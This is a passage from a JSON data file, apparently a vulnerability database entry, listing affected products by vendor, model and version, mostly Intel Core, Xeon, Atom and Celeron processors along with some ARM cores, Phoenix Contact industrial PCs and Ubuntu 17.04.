        "vendor": "intel",
        "version": "3250t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660lm"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v3"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2738"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770te"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5672"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3317u"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3570"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5950hq"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610"
      },
      {
        "_id": null,
        "model": "xeon e5 1660",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 12201 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2618l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2806"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6157u"
      },
      {
        "_id": null,
        "model": "bl2 bpc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500k"
      },
      {
        "_id": null,
        "model": "xeon e3 1275 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2860"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4202y"
      },
      {
        "_id": null,
        "model": "xeon e3 1240 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300t"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2338"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "350m"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6146"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7520"
      },
      {
        "_id": null,
        "model": "cortex-x1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4160"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2850"
      },
      {
        "_id": null,
        "model": "atom x5-e3940",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1505l v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3510"
      },
      {
        "_id": null,
        "model": "xeon e3 1290",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4800mq"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770hq"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620ue"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3480"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2350"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699a_v4"
      },
      {
        "_id": null,
        "model": "xeon e5 2643",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2410m"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v3"
      },
      {
        "_id": null,
        "model": "xeon e3 1245 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5550u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4710mq"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5640"
      },
      {
        "_id": null,
        "model": "bl ppc17 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8164"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2537m"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860_v3"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v3"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3350p"
      },
      {
        "_id": null,
        "model": "xeon e3 1230l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880l_v3"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770s"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640lm"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5540"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y51"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340m"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4710hq"
      },
      {
        "_id": null,
        "model": "xeon e3 1245",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v3"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "17.04"
      },
      {
        "_id": null,
        "model": "xeon e5 2608l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1270",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8170m"
      },
      {
        "_id": null,
        "model": "bl rackmount 2u",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6440eq"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702hq"
      },
      {
        "_id": null,
        "model": "core m5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y54"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4603"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670"
      },
      {
        "_id": null,
        "model": "neoverse n1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2620",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2683_v3"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5775c"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5500u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "940xm"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4005"
      },
      {
        "_id": null,
        "model": "xeon e5 2450 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200m"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790s"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650l"
      },
      {
        "_id": null,
        "model": "atom x7-e3950",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "bl ppc17 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "cortex-r7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340"
      },
      {
        "_id": null,
        "model": "xeon e3 1276 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3450"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8100"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6128"
      },
      {
        "_id": null,
        "model": "xeon e5 2403 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v4"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2558"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3210"
      },
      {
        "_id": null,
        "model": "xeon e3 1245 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3720qm"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4310m"
      },
      {
        "_id": null,
        "model": "xeon e5 2603 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "680"
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4109t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5507"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2420"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2508"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4012y"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5530"
      },
      {
        "_id": null,
        "model": "vl ppc 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3405"
      },
      {
        "_id": null,
        "model": "xeon e3 1280 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5350h"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5250u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770r"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8180"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2120t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3210m"
      },
      {
        "_id": null,
        "model": "xeon e5 2648l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 1630 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690k"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7250"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3250"
      },
      {
        "_id": null,
        "model": "bl bpc 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2603",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2603 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3736f"
      },
      {
        "_id": null,
        "model": "xeon e5 2637 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2650",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v2"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3225"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700hq"
      },
      {
        "_id": null,
        "model": "xeon e5 1650 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100t"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4030u"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v4"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "lc5518"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v3"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5660"
      },
      {
        "_id": null,
        "model": "xeon e3 1240l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3450"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3560"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5287u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "860"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610qe"
      },
      {
        "_id": null,
        "model": "xeon e5 2637 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6134"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "580m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4170t"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4105"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570t"
      },
      {
        "_id": null,
        "model": "bl2 ppc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3450"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7500u"
      },
      {
        "_id": null,
        "model": "xeon e3 1268l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2367m"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2540m"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7550"
      },
      {
        "_id": null,
        "model": "xeon e3 1235",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "vl2 bpc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658a_v3"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7540"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4624l_v2"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3745"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "lc5528"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735e"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "530"
      },
      {
        "_id": null,
        "model": "xeon e5 2628l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700hq"
      },
      {
        "_id": null,
        "model": "xeon e5 1620 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100u"
      },
      {
        "_id": null,
        "model": "xeon e5 2630 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4422e"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2960xm"
      },
      {
        "_id": null,
        "model": "xeon e5 2418l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142m"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5115"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5549"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2940"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3350"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2100"
      },
      {
        "_id": null,
        "model": "xeon e3 1290 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340s"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1850"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3160"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3437u"
      },
      {
        "_id": null,
        "model": "dl ppc15m 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1241 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2516"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1585_v5"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600"
      },
      {
        "_id": null,
        "model": "xeon e3 1230",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570r"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2120"
      },
      {
        "_id": null,
        "model": "xeon e5 2428l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2628l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1245 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300hq"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2480"
      },
      {
        "_id": null,
        "model": "bl ppc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3667u"
      },
      {
        "_id": null,
        "model": "cortex-a57",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2358"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3355"
      },
      {
